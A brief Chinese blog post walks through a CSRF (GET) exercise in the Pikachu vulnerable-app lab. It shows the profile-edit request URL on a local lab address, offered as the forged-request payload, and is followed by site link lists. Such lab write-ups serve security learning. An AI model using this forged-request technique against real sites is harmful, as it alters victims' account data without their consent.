技术栈

Pikachu-csrf-CSRF(get)

什么鬼昵称2024-10-06 13:34

登陆,修改个人信息;发现这是个get请求

把请求连接复制出来

复制代码
​http://192.168.3.224:8082/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=1&add=2&email=3&submit=submit

就是 get请求的csrf 攻击payload

上一篇:Linux基于CentOS学习【进程状态】【进程优先级】【调度与切换】【进程挂起】【进程饥饿】
下一篇:TopK算法在大数据重复数据分析中的应用与挑战
相关推荐
RaidenLiu
4 分钟前
从 Provider 迈向 Riverpod 3:核心架构与迁移指南
前端·flutter
前端进阶者
5 分钟前
electron-vite_18Less和Sass共用样式指定
前端
数字人直播
8 分钟前
稳了!青否数字人分享3大精细化AI直播搭建方案!
前端·后端
江城开朗的豌豆
10 分钟前
我在项目中这样处理useEffect依赖引用类型,同事直呼内行
前端·javascript·react.js
听风的码
13 分钟前
Vue2封装Axios
开发语言·前端·javascript·vue.js
转转技术团队
13 分钟前
前端安全防御策略
前端
掘金一周
20 分钟前
被老板逼出来的“表格生成器”:一个前端的自救之路| 掘金一周 8.21
前端·人工智能·后端
cc_z
25 分钟前
vue代码优化
前端·vue.js
龙在天
29 分钟前
你只会console.log就Out了
前端
用户68172245721
30 分钟前
h5实现点击电话进入拨打电话功能
前端
热门推荐
01UV安装并设置国内源02DeepSeek更新!速览DeepSeek V3.1新特性03Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code04KGG转MP3工具|非KGM文件|解密音频05蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接06【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)072025最新国内服务器可用docker源仓库地址大全(2025年8月更新)08Spring 调试终于不再痛苦了09TRAE 规则(Rules)配置指南:个人习惯、团队规范与最佳实践10Claude Code VSCode集成开发指南:AI编程助手完整配置